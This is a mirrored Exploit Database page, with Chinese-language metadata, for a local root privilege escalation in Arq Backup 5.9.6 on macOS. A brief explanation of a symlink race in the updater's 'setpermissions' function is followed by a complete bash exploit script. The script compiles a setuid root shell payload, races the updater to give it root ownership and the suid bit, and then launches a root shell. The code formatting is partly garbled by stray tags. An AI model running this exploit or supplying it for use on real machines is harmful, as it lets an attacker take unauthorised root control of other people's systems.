Arq 5.9.6 – Local Privilege Escalation

• Exploit Database
• 110 阅读

• 作者： Mark Wadham
  日期： 2017-12-06
• 类别：

  • local
  平台：

  • macos
• 来源：https://www.exploit-db.com/exploits/43218/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78

  # Arq Backup from Haystack Software is a great application for backing up macs and # windows machines. Unfortunately versions of Arq for mac before 5.9.7 are # vulnerable to a local root privilege escalation exploit.   # The updater binary has a "setpermissions" function which sets the suid bit and # root ownership on itself but it suffers from a race condition that allows you to # swap the destination for these privileges using a symlink.   # We can exploit this to get +s and root ownership on any arbitrary binary.   # Other binaries in the application also suffer from the same issue.   # This was fixed in Arq 5.9.7.   # https://m4.rkw.io/arq_5.9.6.sh.txt # 49cc82df33a3e23245c7a1659cc74c0e554d5fdbe2547ac14e838338e823956d # ------------------------------------------------------------------------------ #!/bin/bash   ################################################################## ###### Arq <= 5.9.6 local root privilege escalation exploit ###### ###### by m4rkw - https://m4.rkw.io/blog.html #### ##################################################################   vuln=<code>ls -la /Applications/Arq.app/Contents/Library/LoginItems/\ Arq\ Agent.app/Contents/Resources/arq_updater |grep &apos;rwsr-xr-x&apos; \ |grep root cwd="<code>pwd</code>"   if [ "$vuln" == "" ] ; then echo "Not vulnerable - auto-updates not enabled." exit 1 fi   cat > arq_596_exp.c <<EOF #include <unistd.h> int main() { setuid(0); seteuid(0); execl( "/bin/bash","bash","-c","rm -f $cwd/arq_updater;/bin/bash", NULL ); return 0; } EOF   gcc -o arq_596_exp arq_596_exp.c rm -f arq_596_exp.c   ln -s /Applications/Arq.app/Contents/Library/LoginItems/\ Arq\ Agent.app/Contents/Resources/arq_updater   ./arq_updater setpermissions &>/dev/null& rm -f ./arq_updater mv arq_596_exp ./arq_updater   i=0 timeout=10   while : do r=<code>ls -la ./arq_updater |grep root if [ "$r" != "" ] ; then break fi sleep 0.1 i=$((i+1)) if [ $i -eq $timeout ] ; then rm -f ./arq_updater echo "Not vulnerable" exit 1 fi done   ./arq_updater